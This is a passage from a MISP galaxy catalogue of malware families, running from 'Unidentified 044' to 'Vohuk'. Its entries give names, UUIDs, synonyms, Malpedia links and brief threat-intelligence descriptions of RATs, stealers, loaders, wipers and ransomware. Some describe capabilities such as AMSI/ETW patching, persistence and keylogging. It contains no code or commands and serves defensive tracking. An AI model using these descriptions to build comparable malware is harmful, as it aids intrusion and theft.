type	[]

Unidentified 044

Internal MISP references

UUID df9c8440-b4da-4226-b982-e510d06cf246 which can be used as unique global reference for Unidentified 044 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 045

Internal MISP references

UUID 4cb8235a-7e70-4fad-9244-69215750d559 which can be used as unique global reference for Unidentified 045 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 047

RAT written in Delphi used by Patchwork APT.

Internal MISP references

UUID 18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2 which can be used as unique global reference for Unidentified 047 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 052

Internal MISP references

UUID 80c12fcd-e5ef-4549-860d-7928363022f9 which can be used as unique global reference for Unidentified 052 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 053 (Wonknu?)

Internal MISP references

UUID b60e32bd-158a-42b9-ac21-288bca4c8233 which can be used as unique global reference for Unidentified 053 (Wonknu?) in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 057

Unnamed portscanner as used in the Australian Parliament Hack (Feb 2019).

Internal MISP references

UUID 1b8e86ab-57b2-4cd9-a768-a7118b4eb4be which can be used as unique global reference for Unidentified 057 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 058

Internal MISP references

UUID bab52335-be9e-4fad-b68e-f124b0d69bbc which can be used as unique global reference for Unidentified 058 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 066

This .net executable can receive commands from c2 sever, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. At the end, it downloads a Python-based RAT, called PeppyRAT.

Internal MISP references

UUID e78c402f-998b-43ff-8102-f54838afcb8b which can be used as unique global reference for Unidentified 066 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 067

Internal MISP references

UUID 224066ee-4266-44a3-8ea2-b5d7b9b4969a which can be used as unique global reference for Unidentified 067 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 068

Internal MISP references

UUID 26bfad72-59d8-456e-a200-eb18e614e5cb which can be used as unique global reference for Unidentified 068 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 069 (Zeus Unnamed2)

Zeus derivate, no known public references.

Internal MISP references

UUID cc66d112-2ff5-462c-b029-15458d51f8a7 which can be used as unique global reference for Unidentified 069 (Zeus Unnamed2) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 070 (Downloader)

Unidentified downloader, possibly related to KONNI.

Internal MISP references

UUID 0bdef005-fd36-4ce0-a215-d49bf05b8fb8 which can be used as unique global reference for Unidentified 070 (Downloader) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 071 (Zeus Unnamed1)

Internal MISP references

UUID cc7de9da-dc33-4cf8-9388-986b001fad63 which can be used as unique global reference for Unidentified 071 (Zeus Unnamed1) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 072 (Metamorfo Loader)

MSI-based loader that has been observed as a stager for win.metamorfo.

Internal MISP references

UUID f2979fee-603d-496e-a526-d622e9cba84f which can be used as unique global reference for Unidentified 072 (Metamorfo Loader) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 074 (Downloader)

Internal MISP references

UUID 4b60bda2-c587-4069-ace1-6283891d5faf which can be used as unique global reference for Unidentified 074 (Downloader) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 075

Unpacked http_dll.dat from the blog post.

Internal MISP references

UUID 66f26a60-ab6a-4b7c-bd85-afdc44dbcfdd which can be used as unique global reference for Unidentified 075 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 076 (Higaisa LNK to Shellcode)

Internal MISP references

UUID 4d5d0798-9cb3-4f26-8c98-db8d7190d187 which can be used as unique global reference for Unidentified 076 (Higaisa LNK to Shellcode) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 077 (Lazarus Downloader)

Internal MISP references

UUID ca8a1900-ea9a-4d83-8873-6c48ac12da9a which can be used as unique global reference for Unidentified 077 (Lazarus Downloader) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 078 (Zebrocy Nim Loader?)

Suspected Zebrocy loader written in Nim.

Internal MISP references

UUID 99099489-eeb9-415a-a3b8-6133e774bed0 which can be used as unique global reference for Unidentified 078 (Zebrocy Nim Loader?) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 080

This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. It is also used by attackers to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.

Internal MISP references

UUID f12b3029-87a1-4632-855f-4fef784210bd which can be used as unique global reference for Unidentified 080 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 083 (AutoIT Stealer)

Internal MISP references

UUID 438ab9a3-3e2b-4241-8bcb-e61c2d118772 which can be used as unique global reference for Unidentified 083 (AutoIT Stealer) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 085

A RAT written in .NET, potentially used by Transparent Tribe.

Internal MISP references

UUID f80e8948-8e1e-4ecf-8d5e-08148e4dd2b0 which can be used as unique global reference for Unidentified 085 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 087

Symantec describes this family as an unidentified tool set used to target a range of organizations in South East Asia. The campaign was first noticed in September 2020.

Internal MISP references

UUID a4c9861e-93c6-4b2b-aa2d-71c1405375b4 which can be used as unique global reference for Unidentified 087 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 088 (Nim Ransomware)

Ransomware written in Nim.

Internal MISP references

UUID d7f1e6cf-1880-426a-881a-619309f32c37 which can be used as unique global reference for Unidentified 088 (Nim Ransomware) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 091

Avast found this unidentified RAT, which abuses a code-signing certificate by the Philippine Navy. It is statically linked against OpenSSL 1.1.1g.

Internal MISP references

UUID 33c8e201-9cd1-4a44-9380-3e3d3d6894c3 which can be used as unique global reference for Unidentified 091 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 092 (Confucius Backdoor)

According to Antiy CERT, this is a C++ backdoor that was first discovered in an attack by Confucius in September 2020. Its main functions include creating scheduled tasks, retrieving process information, retrieving network adapter information, retrieving disk drive information, uploading files, downloading files, executing files, and providing shell access.

Internal MISP references

UUID 22ed4f2a-2ed4-4235-97c3-69913bc80a00 which can be used as unique global reference for Unidentified 092 (Confucius Backdoor) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 093 (Sidewinder)

Check Point Research observed this malware being used by Sidewinder.

Internal MISP references

UUID 9b7dfe8f-c06e-4803-9792-48ca369e80b3 which can be used as unique global reference for Unidentified 093 (Sidewinder) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 095 (Iranian Wiper)

Wiper, using EldoS RawDisk for low level access to disks.

Internal MISP references

UUID 925f7a39-9674-4209-a31a-e09c27117328 which can be used as unique global reference for Unidentified 095 (Iranian Wiper) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 096 (Keylogger)

Keylogger.

Internal MISP references

UUID 0c87cf0d-fa54-4962-817d-eac4c817b21a which can be used as unique global reference for Unidentified 096 (Keylogger) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 097 (Polonium Keylogger)

Internal MISP references

UUID 32fe5b04-1af6-4696-a329-604a9f637c85 which can be used as unique global reference for Unidentified 097 (Polonium Keylogger) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 098 (APT29 Slack Downloader)

Internal MISP references

UUID db87fd2d-08ff-431d-86b8-35e31c9fcc9b which can be used as unique global reference for Unidentified 098 (APT29 Slack Downloader) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 099 (APT29 Dropbox Loader)

This malware uses DropBox for C2 and was spread via spear-phishing attack at government organizations. It is different from win.boombox, which is another APT29 attributed malware using DropBox (written in .NET).

Internal MISP references

UUID 541a0a05-5c7f-4646-a96b-a4d26d5fa89d which can be used as unique global reference for Unidentified 099 (APT29 Dropbox Loader) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 100 (APT-Q-12)

Internal MISP references

UUID 0ee92ce5-e33d-4393-a466-6b5f6a1ca6a5 which can be used as unique global reference for Unidentified 100 (APT-Q-12) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 103 (FIN8)

A malware that uses .NET to load unmanaged (shell)code which has some resemblance to BADHATCH, the IP found in the sample was referred to in coverage on WHITERABBIT ransomware attacks.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Unidentified 103 (FIN8).

Known Synonyms
`Sardonic`

Internal MISP references

UUID 07106811-cd07-4d05-906d-c05208758b00 which can be used as unique global reference for Unidentified 103 (FIN8) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 104

Internal MISP references

UUID ec530093-5ffc-45f1-b04d-accf3269b2d2 which can be used as unique global reference for Unidentified 104 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 105

Internal MISP references

UUID 07464f74-f587-4266-b828-448c67d2bd85 which can be used as unique global reference for Unidentified 105 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 106

This is possibly related to the MATA framework / Dacls.

Internal MISP references

UUID da2d8044-ed12-4951-bcd8-fd1e1335244a which can be used as unique global reference for Unidentified 106 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 107 (APT29)

Small shellcode downloader, likely used by APT29.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Unidentified 107 (APT29).

Known Synonyms
`ICEBEAT`

Internal MISP references

UUID e83a3731-9c84-4e36-a2da-9e6c9c2461d7 which can be used as unique global reference for Unidentified 107 (APT29) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 108

Internal MISP references

UUID ee09eba1-e96e-476f-9372-e99218d8ab90 which can be used as unique global reference for Unidentified 108 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 109 (Lazarus?)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Unidentified 109 (Lazarus?).

Known Synonyms
`IMEEX`

Internal MISP references

UUID ad37d6ad-e9b7-4652-8a2e-502b170932e7 which can be used as unique global reference for Unidentified 109 (Lazarus?) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 110 (RustyFlag)

According to Deep Instinct, this information stealer is written in Rust and was observed in Operation Rusty Flag.

Internal MISP references

UUID 00dac929-3038-4fc1-a1a5-0fd895126e92 which can be used as unique global reference for Unidentified 110 (RustyFlag) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 112 (Rust-based Stealer)

A Rust-based stealer, observed by Seqrite, along TTPs overlapping with Pakistan-linked APT groups.

Internal MISP references

UUID 1f50fa09-9c0f-40f8-9431-bd122dd347ff which can be used as unique global reference for Unidentified 112 (Rust-based Stealer) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 113 (RAT)

According to Phylum, this is a RAT with these characteristics: * Registers as a scheduled task. * Receives commands from a remote server using web sockets. * Installs Chrome extensions to Secure Preferences. * Configures AnyDesk, hides the screen, and disables shutting down Windows. * Captures keyboard and mouse events. * Collects information about files, browser extensions, and browser history.

Internal MISP references

UUID 24f6e2e6-69c0-4a43-9036-cf275d3aa7ee which can be used as unique global reference for Unidentified 113 (RAT) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 114 (APT28 InfoStealer)

According to Trend Micro, this is a small information stealer written in .NET, that pushes its loot to a benign file sharing service and does not have a direct C&C callback.

Internal MISP references

UUID 1f59adb5-43e1-438b-b1c0-18af13ee3b12 which can be used as unique global reference for Unidentified 114 (APT28 InfoStealer) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 115 (Nim Loader)

According to Walmart, this is a loader written in Nim that contains an AmsiScanBuffer patch followed by a EtwEventWrite patch and that will download/decrypt a payload via AES CFB and inject it into a hardcoded process target (e.g. explorer.exe).

Internal MISP references

UUID 63e6b775-eecc-462d-ae3c-31c03375e99e which can be used as unique global reference for Unidentified 115 (Nim Loader) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 116 (Miner)

This malware family delivers its artifacts packed with free and generic packers. It writes files to windows temporary folders, downloads additional malware (generally cryptominers) and deletes itself.

Internal MISP references

UUID ba7706c1-7d2a-4031-9acc-cb862860da1a which can be used as unique global reference for Unidentified 116 (Miner) in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_116 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 117 (Donot Loader)

Internal MISP references

UUID ac2bc9a6-d30d-40a3-9bb4-541f5c1e3d2b which can be used as unique global reference for Unidentified 117 (Donot Loader) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unlock92

Internal MISP references

UUID 036e657f-a752-4a4c-bb30-f15c24d954e6 which can be used as unique global reference for Unlock92 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

UPAS

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UPAS.

Known Synonyms
`Rombrast`

Internal MISP references

UUID b64ea39b-3ec2-49e3-8992-02d71c21b1bd which can be used as unique global reference for UPAS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Upatre

Upatre is primarly a downloader. It has been discovered in 2013 and since that time it has been widely updated. Upatre is responsible for delivering further malware to the victims, in specific upatre was a prolific delivery mechanism for Gameover P2P in 2013-2014 and then for Dyre in 2015.

Internal MISP references

UUID 925390a6-f88d-46dc-96ae-4ebc9f0b50b0 which can be used as unique global reference for Upatre in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Urausy

Internal MISP references

UUID 5af4838f-1b4d-4f0b-bd27-50ef532e84f7 which can be used as unique global reference for Urausy in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy - webarchive

Associated metadata

Metadata key	Value
type	[]

UrlZone

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UrlZone.

Known Synonyms
`Bebloh`
`Shiotob`

Internal MISP references

UUID ed9f995b-1b41-4b83-a978-d956670fdfbe which can be used as unique global reference for UrlZone in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Uroburos (Windows)

Uroburos is a driver for Windows, including a bypass of PatchGuard. According to Andrzej Dereszowski and Matthieu Kaczmarek, "the techniques used demonstrate [their] excellent knowledge of Windows kernel internals."

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Uroburos (Windows).

Known Synonyms
`Snake`

Internal MISP references

UUID d674ffd2-1f27-403b-8fe9-b4af6e303e5c which can be used as unique global reference for Uroburos (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

USBCulprit

According to Kaspersky, USBCulprit is a malware that is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.

Internal MISP references

UUID 56af8251-4236-42e0-99bc-2c32377e97bb which can be used as unique global reference for USBCulprit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

USBferry

Internal MISP references

UUID 6d0a92c0-cad8-4470-b780-3041774acad3 which can be used as unique global reference for USBferry in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vadokrist

ESET reports that Vadokrist is a Latin American banking trojan that they have been tracking since 2018 and that is active almost exclusively in Brazil.

Internal MISP references

UUID d4ab5619-2347-4949-8102-78296b87a08c which can be used as unique global reference for Vadokrist in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vaggen

Internal MISP references

UUID 006621d1-a3bd-40f2-a55c-d79c84879a6b which can be used as unique global reference for Vaggen in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ValleyRAT

Internal MISP references

UUID fcf8f520-27a9-493e-a274-fbfd70b733b0 which can be used as unique global reference for ValleyRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VALUEVAULT

Internal MISP references

UUID dd95eefd-2ef3-4bda-9065-18f4b03c2249 which can be used as unique global reference for VALUEVAULT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

vanillarat

Description:

VanillaRat is an advanced remote administration tool coded in C#. VanillaRat uses the Telepathy TCP networking library, dnlib module reading and writing library, and Costura.Fody dll embedding library. Features:

Remote Desktop Viewer (With remote click)
File Browser (Including downloading, drag and drop uploading, and file opening)
Process Manager
Computer Information
Hardware Usage Information (CPU usage, disk usage, available ram)
Message Box Sender
Text To Speech
Screen Locker
Live Keylogger (Also shows current window)
Website Opener
Application Permission Raiser (Normal -> Admin)
Clipboard Text (Copied text)
Chat (Does not allow for client to close form)
Audio Recorder (Microphone)
Process Killer (Task manager, etc.)
Remote Shell
Startup
Security Blacklist (Drag client into list if you don't want connection. Press del. key on client to remove from list)

Internal MISP references

UUID 5bb80b4a-d304-460a-bb07-417dea64f213 which can be used as unique global reference for vanillarat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VaporRage

According to Mandiant, VaporRage or BOOMMIC, is a shellcode downloader written in C that communicates over HTTPS. Shellcode Payloads are retrieved from a hardcoded C2 that uses an encoded host_id generated from the targets domain and account name. BOOMMIC XOR decodes the downloaded shellcode payload in memory and executes it.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VaporRage.

Known Synonyms
`BOOMMIC`

Internal MISP references

UUID 5a76d7a1-486e-4f4e-9e23-e544ee9f2ef9 which can be used as unique global reference for VaporRage in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Varenyky

In May 2019, ESET researchers observed a spike in ESET telemetry data regarding malware targeting France. After further investigations, they identified malware that distributes various types of spam. One of them is leading to a survey that redirects to a dodgy smartphone promotion while the other is a sextortion campaign. The spam targets the users of Orange S.A., a French ISP.

Internal MISP references

UUID f0740430-248f-4dd9-a2f3-b2592090a8a6 which can be used as unique global reference for Varenyky in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vawtrak

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vawtrak.

Known Synonyms
`Catch`
`NeverQuest`
`grabnew`

Internal MISP references

UUID b662c253-5c87-4ae6-a30e-541db0845f67 which can be used as unique global reference for Vawtrak in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Veaty

Internal MISP references

UUID 25546977-de99-4c78-9322-0355cfcebcc8 which can be used as unique global reference for Veaty in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Veeam Dumper

Credential Stealer, written in .NET.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Veeam Dumper.

Known Synonyms
`Eamfo`

Internal MISP references

UUID f85bbceb-dc51-4c11-93a6-21a72255dcaf which can be used as unique global reference for Veeam Dumper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VegaLocker

Delphi-based ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VegaLocker.

Known Synonyms
`Buran`
`Vega`

Internal MISP references

UUID 704bb00f-f558-4568-824c-847523700043 which can be used as unique global reference for VegaLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VEILEDSIGNAL

Internal MISP references

UUID b75f0dfd-15df-439d-8ff0-8e8f87656565 which can be used as unique global reference for VEILEDSIGNAL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Velso

Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension.

Internal MISP references

UUID 5490d2c7-72db-42cf-a1a4-02be1b3ade5f which can be used as unique global reference for Velso in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vendetta

Ransomware, which appears to be a rebranding of win.cuba.

Internal MISP references

UUID bd774e26-f558-444b-abe6-c75868374d5e which can be used as unique global reference for Vendetta in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Venom RAT

Internal MISP references

UUID 2ce1f55e-ac43-4fcb-b647-ff5ae9c26b7c which can be used as unique global reference for Venom RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VenomLNK

VenomLNK is the initial phase of the more_eggs malware-as-a-service. It is a poisoned .lnk file that depends on User Execution and points to LOLBINs (often cmd.exe) with additional obfuscated scripting options. This typically initiates WMI abuse and TerraLoader, which can load additional functionality through various plugins.

Internal MISP references

UUID dea1ff4f-bc6d-40c0-9d19-b60578ea1344 which can be used as unique global reference for VenomLNK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Venom Proxy

According to Cisco Talos, this is a reverse proxy socks5 server-client tool originally developed for penetration testers.

Internal MISP references

UUID cd2ba5b9-1bfd-41c9-acf2-259a991986c6 which can be used as unique global reference for Venom Proxy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Venus Locker

Internal MISP references

UUID 7a0137ad-df7a-4fae-8365-eb36cc7e60cd which can be used as unique global reference for Venus Locker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vermilion Strike (Windows)

Internal MISP references

UUID f2db1f70-a284-42c1-9f5a-4b2f46dc8868 which can be used as unique global reference for Vermilion Strike (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vermin

Internal MISP references

UUID 2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1 which can be used as unique global reference for Vermin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vetta Loader

Vetta Loader is a persistent Loader spreading with infected USB drives. It downloads other components leveraging legit hosting services. https://yoroi.company/wp-content/uploads/2023/12/202311-Vetta-Loader_Def-min.pdf

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vetta Loader.

Known Synonyms
`BrokerLoader`
`EMPTYSPACE`

Internal MISP references

UUID f5dafd8f-1003-4002-ae05-ecbaa3ba6817 which can be used as unique global reference for Vetta Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vflooder

Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protected by VMProtect.

Internal MISP references

UUID 044849d3-d0de-4f78-b67d-bfbe8dd3a255 which can be used as unique global reference for Vflooder in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VHD Ransomware

Internal MISP references

UUID fb0ad46d-20b6-4e8c-b401-702197667272 which can be used as unique global reference for VHD Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VictoryGate

VictoryGate was the name of a cryptomining botnet, which was disrupted by ESET researchers in April 2020. The used malware itself was also referred to as VictoryGate. It was spotted in May 2019 and targeted mainly Latin American users, specifically, Peru (Criptonizando states 90% of the botnet publication residing there). Both public and private sectors were targeted. This cryptojacking malware was specialized in Monero (XRM) cryptocurrency. VictoryGate shows very strong code overlap with win.orchard.

Internal MISP references

UUID 229cd7f6-2514-42b8-baa6-0c2a22cd5d9c which can be used as unique global reference for VictoryGate in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vidar

Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.

Internal MISP references

UUID 1f44c08a-b427-4496-9d6d-909b6bf34b9b which can be used as unique global reference for Vidar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VIGILANT CLEANER

Wiper malware discovered by Japanese security firm Mitsui Bussan Secure Directions (MBSD), which is assumed to target Japan, the host country of the 2021 Summer Olympics. In addition to targeting common file Office-related files, it specifically targets file types associated with the Japanese word processor Ichitaro.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VIGILANT CLEANER.

Known Synonyms
`VIGILANT CHECKER`

Internal MISP references

UUID 65711172-14f7-4e3d-9aca-7895b37b2e9a which can be used as unique global reference for VIGILANT CLEANER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vilsa Stealer

Internal MISP references

UUID 86011ece-affa-4913-8674-a68096a77122 which can be used as unique global reference for Vilsa Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

virdetdoor

Internal MISP references

UUID 30161733-993f-4a1c-bcc5-7b4f1cd7d9e4 which can be used as unique global reference for virdetdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VirLock

Polymorphic parasitic file infecting virus which transforms files into copies of itself. Additionally it uses screen-locking as a ransomware technique.

Internal MISP references

UUID 86ea83f1-c06c-4ee3-9c4e-df302974f649 which can be used as unique global reference for VirLock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VIRTUALGATE

Internal MISP references

UUID 48d47a27-464a-4087-b691-574c3b494efb which can be used as unique global reference for VIRTUALGATE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Virut

Internal MISP references

UUID 2e99f27c-6791-4695-b88b-de4d4cbda8d6 which can be used as unique global reference for Virut in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vizom

Internal MISP references

UUID a49d6db9-32a0-42a8-acb9-174146a7fafa which can be used as unique global reference for Vizom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vjw0rm

VJW0rm (aka Vengeance Justice Worm) is a publicly available, modular JavaScript RAT. Vjw0rm was first released in November 2016 by its primary author, v_B01 (aka Sliemerez), within the prominent DevPoint Arabic-language malware development community. VJW0rm appears to be the JavaScript variant of a series of RATs with identical functionality released by the author throughout late 2016. Other variants include a Visual Basic Script (VBS) based worm titled vw0rm (Vengeance Worm), an AutoHotkey-based tool called vrw0rm (Vengeance Rise Worm), and a PowerShell-based variant called vdw0rm (Vengeance Depth Worm).

Internal MISP references

UUID 3a8186f1-ff2a-4431-be99-7e31c0096f15 which can be used as unique global reference for Vjw0rm in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VM Zeus

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VM Zeus.

Known Synonyms
`VMzeus`
`Zberp`
`ZeusVM`

Internal MISP references

UUID c32740a4-db2c-4d71-80bd-7377185f4a6f which can be used as unique global reference for VM Zeus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vobfus

Malware of this family searches for computers on a network and creates copies of itself in folders with open access. For the program to be activated, the user must first run it on the computer. The code of this malware is written in the Visual Basic programming language and uses obfuscation, which is a distinguishing feature of this family. Code obfuscation complicates attempts by anti-virus software to analyze suspected malware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vobfus.

Known Synonyms
`Beebone`

Internal MISP references

UUID 60f7b1b9-c283-4395-909f-7b8b1731e840 which can be used as unique global reference for Vobfus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vohuk

Internal MISP references

